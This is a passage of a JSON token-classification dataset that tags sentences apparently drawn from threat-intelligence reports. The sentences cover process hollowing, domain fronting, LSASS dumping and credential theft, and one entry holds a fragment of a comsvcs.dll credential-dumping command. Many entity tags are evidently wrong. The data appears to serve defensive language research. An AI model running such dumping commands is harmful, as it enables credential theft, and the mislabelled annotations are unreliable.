"ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "injected", - "process" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "goes", - "through", - "processes", - "one", - "by", - "one" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "steal", - "victims’", - "sensitive", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "its", - "main", - "bot", - "into", - "a", - "hollowed", - "instance", - "of", - "svchost.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "implemented", - "process", - "hollowing", - "by", - "first", - "using", - "VirtualProtectEx", - "on", - "the", - "process", - "entrypoint,", - "and", - "then", - "writing", - "the", - "hook", - "stub", - "using", - "WriteProcessMemory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Process", - "hollowing", - "is", - "a", - "process", - "injection", - "technique", - "that", - "creates", - "a", - "new", - "legitimate", - "process", - "in", - "a", - "suspended", - "mode,", - "unmaps", - "its", - "main", - "image", - "and", - "replaces", - "it", - "with", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malicious", - "code", - "is", - "written", - "into", - "the", - "newly", - "created", - "process", - "and", - "the", - "suspended", - "thread", - "context", - "instruction", - "pointer", - "is", - "changed", - "using", - "NtGetContextThread/NtSetContextThread." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "for", - "process", - "hollowing", - "from", - "a", - "WoW64", - "process", - "into", - "a", - "64-bit", - "svchost.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Evasive", - "Process", - "Hollowing", - "By", - "Entrypoint", - "Patching" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Evasive", - "Process" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Evasive", - "Process", - "Hollowing", - "by", - "Entrypoint", - "Patching" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Decompresses", - "a", - "local", - "buffer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Common", - "injection", - "methods", - "used", - "by", - "banking", - "Trojans", - "involve", - "writing", - "a", - "mapped", - "PE", - "into", - "a", - "remote", - "process", - "using", - "WriteProcessMemory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "obscure", - "the", - "call", - "by", - "wiping", - "artifacts", - "from", - "the", - "buffer,", - "such", - "as", - "wiping", - "the", - "PE", - "header." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "malware", - "disguised", - "as", - "Hancom", - "Office", - "document", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“Who", - "and", - "What", - "Threatens", - "the", - "World", - "(Column).exe”", - "and", - "is", - "designed", - "to", - "deceive", - "users", - "by", - "using", - "an", - "icon", - "that", - "is", - "similar", - "to", - "that", - "of", - "Hancom", - "Office." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "a", - "folder", - "named", - "onedrivenew", - "in", - "the", - "AppData", - "directory", - "and", - "self-copying", - "itself", - "with", - "the", - "filename", - "onedrivenew.exe", - "to", - "appear", - "as", - "a", - "normal", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "creating", - "and", - "executing", - "a", - "normal", - "Hancom", - "Office", - "file", - "with", - "the", - "same", - "filename", - "as", - "the", - "malware", - "within", - "the", - "same", - "directory", - "where", - "the", - "malware", - "was", - "executed." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "connect", - "to", - "a", - "certain", - "URL", - "every", - "60", - "minutes", - "using", - "the", - "normal", - "Windows", - "file", - "mshta.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "URL", - "registered", - "in", - "the", - "task", - "scheduler", - "appears", - "to", - "be", - "a", - "normal", - "homepage" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decompressing", - "the", - "compressed", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decompressing" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "injected", - "and", - "executed", - "within", - "the", - "normal", - "Windows", - "process", - "called", - "mstsc.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "of", - "mstsc.exe", - "being", - "executed", - "after", - "being", - "injected", - "with", - "malware" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deleted", - "using", - "the", - "cmd", - "command." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "registers", - "its", - "file", - "with", - "the", - "name", - "onedrivenew", - "under", - "the", - "Run", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "registers", - "its", - "file", - "with", - "the", - "name", - "onedrivenew", - "under", - "the", - "Run", - "key", - "in", - "order", - "to", - "make", - "it", - "run", - "after", - "the", - "system", - "is", - "rebooted." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "schtasks.exe", - "command", - "to", - "register", - "the", - "file", - "to", - "the", - "task", - "scheduler", - "with" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "URL", - "registered", - "in", - "the", - "task", - "scheduler" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "connect", - "to", - "a", - "certain", - "URL", - "every", - "60", - "minutes", - "using", - "the", - "normal", - "Windows", - "file", - "mshta.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "using", - "an", - "obfuscated", - "Meterpreter", - "stager" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "One", - "of", - "the", - "techniques", - "to", - "conceal", - "the", - "traffic", - "from", - "DNS-based", - "filtering", - "is", - "Domain", - "Fronting." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Domain", - "fronting", - "uses", - "legitimate", - "or", - "high-reputation", - "domains", - "to", - "remain", - "undetected", - "by", - "defenders." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "domains", - "for", - "domain", - "fronting", - "may", - "indicate", - "an", - "interest", - "in", - "the", - "geopolitics", - "of", - "this", - "area", - "of", - "the", - "world." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "domain", - "fronting", - "functionality", - "before", - "launching", - "the", - "attack." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "The", - "actor", - "in", - "this", - "campaign", - "has", - "used", - "domain", - "fronting,", - "which", - "is", - "a", - "technique", - "which", - "can", - "use", - "high", - "reputation", - "domains", - "to", - "conceal", - "the", - "Cobalt", - "Strike", - "command", - "and", - "control", - "traffic." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-OffAct", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Domain", - "fronting", - "can", - "be", - "achieved", - "with", - "a", - "redirect", - "between", - "the", - "malicious", - "server", - "and", - "the", - "target." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "actors", - "may", - "misuse", - "various", - "content", - "delivery", - "networks", - "(CDNs)", - "to", - "set", - "up", - "redirects", - "of", - "serving", - "content", - "to", - "the", - "content", - "served", - "by", - "attacker-controlled", - "C2", - "hosts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "beacons", - "are", - "of", - "particular", - "interest", - "due", - "to", - "the", - "domain", - "fronting", - "technique", - "using", - "a", - "government", - "host", - "as", - "the", - "initial", - "DNS", - "lure." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "DNS", - "request", - "for", - "the", - "initial", - "host", - "resolves", - "to", - "a", - "Cloudflare-owned", - "IP", - "address", - "that", - "allows", - "the", - "attacker", - "to", - "employ", - "domain", - "fronting", - "and", - "send", - "the", - "traffic", - "to", - "the", - "actual", - "C2", - "host" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Domain", - "fronting", - "is", - "a", - "technique", - "used", - "by", - "attackers", - "to", - "circumvent", - "protection", - "based", - "on", - "DNS", - "filtering." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "modify", - "the", - "subsequent", - "HTTPs", - "requests", - "header", - "to", - "instruct", - "the", - "CDN", - "to", - "direct", - "the", - "traffic", - "to", - "an", - "attacker-controlled", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "in", - "this", - "case", - "uses", - "domain", - "fronting", - "with", - "the", - "Cloudflare", - "Content", - "Delivery", - "Network" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - ".]net", - "via", - "HTTP", - "Get", - "and", - "POST", - "metadata", - "specified", - "in", - "the", - "beacon's", - "configuration." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "relies", - "on", - "other", - "parts", - "of", - "the", - "HTTP", - "request,", - "including", - "the", - "Host", - "header", - "and", - "the", - "actual", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "suspicious", - "section", - ".kxrt", - "with", - "the", - "packed", - "and", - "encoded", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decryption", - "routine", - "is", - "executed", - "that", - "decrypts", - "the", - "remaining", - "malicious", - "code", - "in", - "the", - ".kxrt", - "section", - "and", - "writes", - "it", - "to", - "the", - "virtual", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decoder", - "routine", - "to", - "decrypt", - "the", - "beacon", - "DLL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "malicious", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "decoded,", - "the", - "loader's", - "execution", - "jumps", - "to", - "the", - "beginning", - "of", - "the", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "now", - "responsible", - "for", - "decoding", - "the", - "configuration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "calling", - "WinHTTPGetProxyForUrlEx", - "and", - "WinHTTPCreateProxyResolver" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "calls", - "the", - "VirtualProtect", - "function" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "modifies", - "the", - "victim's", - "system", - "power", - "and", - "lid", - "open/close", - "policies", - "in", - "the", - "registry." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "also", - "manage", - "the", - "system", - "power", - "policies", - "registry", - "keys", - "to", - "set", - "the", - "minimum", - "and", - "maximum", - "sleep", - "times", - "and", - "the", - "lid", - "open", - "and", - "close", - "action", - "policy." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "routed", - "through", - "European", - "TOR", - "VPN", - "exit", - "nodes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VPN", - "access", - "using", - "Single", - "Factor", - "authentication." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Minidump", - "of", - "LSASS", - "process", - "memory" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "minidump", - "function", - "of", - "comsvcs.dll", - "can", - "be", - "used", - "to", - "dump", - "lsass.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "leveraging", - "comsvcs.dll", - "with", - "proxy", - "execution", - "by", - "rundll32.exe." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "do", - "rundll32.exe", - "C:\\windows\\System32\\comsvcs.dll," - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Conducting", - "discovery", - "indirectly", - "via", - "schedule", - "tasks", - "named", - "“Windows", - "Update”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam" - ] - }, - { - "tokens": [ - "performing", - "remote", - "directory", - "listings." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "discover", - "interesting", - "to", - "them", - "directories" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Leveraging", - "a", - "dual-use", - "tool,", - "PCHunter64,", - "to", - "acquire", - "detailed", - "process", - "and", - "system", - "information." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "can", - "use", - "windows", - "binaries", - "and", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDP", - "connection", - "established" - ], - "ner_tags": [ - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Remote", - "Desktop", - "Protocol", - "(RDP),", - "and", - "the", - "threat", - "actor", - "was", - "able", - "to", - "move", - "freely", - "across", - "the", - "network" - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "was", - "able", - "to", - "RDP", - "unencumbered", - "across", - "the", - "organization’s", - "infrastructure." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "executed", - "two", - "actions", - "to", - "bypass", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "leveraged", - "one", - "of", - "the", - "most", - "popular", - "dual-use", - "agents,", - "AnyDesk,", - "to", - "provide", - "persistent", - "remote", - "access", - "into", - "the", - "affected", - "organization", - "on", - "multiple", - "systems." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Purp", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "several", - "files", - "were", - "staged", - "for", - "possible,", - "but", - "unconfirmed", - "exfiltration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "spear", - "phishing", - "emails", - "that", - "contain", - "a", - ".csv", - "or", - ".xlt", - "file", - "attachment" - ], - "ner_tags": [ - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "email", - "is", - "directed", - "to", - "“Non-Resident", - "Alien”", - "tax", - "payers", - "to", - "have", - "them", - "fill", - "out", - "a", - "PDF", - "file", - "(that", - "is", - "attached", - "to", - "the", - "email)" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "a", - "cyber-attack", - "in", - "the", - "form", - "of", - "credential", - "stuffing," - ], - "ner_tags": [ - "O", - "B-Org", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Enduring", - "Credential", - "Stuffing" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "login", - "credentials", - "from", - "what", - "the", - "company", - "suspects", - "are", - "past", - "data", - "breaches", - "from", - "other", - "companies" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "replace", - "the", - "“ServiceManager.exe”", - "file", - "from", - "the", - "driver", - "folder", - "with", - "a", - "malicious", - "file", - "to", - "trick", - "the", - "driver", - "into", - "running", - "the", - "tainted", - "file" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "log", - "keystrokes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "vulnerability", - "in", - "unencrypted", - "Wi-Fi", - "routers", - "that", - "makes", - "them", - "susceptible", - "to", - "a", - "TCP", - "exploit." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp" - ] - }, - { - "tokens": [ - "A", - "threat", - "actor", - "could", - "take", - "advantage", - "of", - "this", - "vulnerability", - "by", - "creating", - "a", - "specific", - "file", - "that", - "contains", - "data", - "that", - "is", - "stored", - "in", - "the", - "JET", - "database", - "format,", - "and", - "having", - "the", - "targeted", - "user", - "open", - "it,", - "which", - "would", - "then", - "allow", - "for", - "remote", - "code", - "execution", - "at", - "the", - "level", - "of", - "the", - "current", - "process" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "vulnerability,", - "registered", - "as", - "“CVE-2018-14327,”", - "allows", - "a", - "low-privileged", - "user", - "account", - "to", - "escalate", - "privileges", - "on", - "any", - "Windows", - "machine", - "that", - "had", - "connected", - "to", - "the", - "EE", - "Mini", - "modem", - "via", - "USB." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "that", - "specific", - "payload", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "threat", - "actor", - "could", - "establish", - "an", - "administrator", - "session" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "payload", - "download", - "code", - "that", - "grabs", - "malware", - "to", - "download", - "and", - "install", - "the", - "backdoor." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "sign", - "on", - "as", - "a", - "legitimate", - "user" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "database", - "passwords", - "from", - "Windows", - "registry", - "values" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "them", - "from", - "Windows", - "registry", - "values" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "the", - "more", - "sensitive", - "data", - "in", - "the", - "user’s", - "database." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "these", - "database", - "passwords," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decryption" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decryption" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "password" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "dba", - "user", - "password." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "this", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "the", - "appropriate", - "loader" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decryption" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "them" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "gather", - "database", - "passwords" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "steal", - "database", - "passwords", - "and", - "configuration", - "information" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "steal", - "credentials", - "by", - "decrypting", - "them", - "from", - "registry", - "values." - ], - "ner_tags": [ - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exfiltrated", - "credentials" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "these", - "database", - "passwords" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "password", - "for", - "the", - "dba", - "username" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "dba", - "user", - "password." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "successfully", - "obtain", - "the", - "database", - "passwords" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "steal", - "credentials", - "by", - "decrypting", - "them", - "from", - "registry", - "values" - ], - "ner_tags": [ - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encryption", - "key", - "for", - "sensitive", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "encryption" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "encryption" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "XORed", - "with", - "the", - "value" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "using", - "its", - "own", - "XOR", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "write", - "module", - "to", - "the", - "encrypted", - "storage" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "unpacks", - "and", - "loads", - "the", - "next", - "stage", - "of", - "the", - "malware,", - "namely", - "the", - "main", - "module" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "unpacking", - "the", - "main", - "module", - "and" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "handles", - "communication", - "between", - "the", - "modules", - "and", - "attacker’s", - "C&C", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "0x10000013data", - "for", - "C&C", - "server", - "(execution", - "logs,", - "stolen", - "data,", - "…)" - ], - "ner_tags": [ - "O", - "O", - 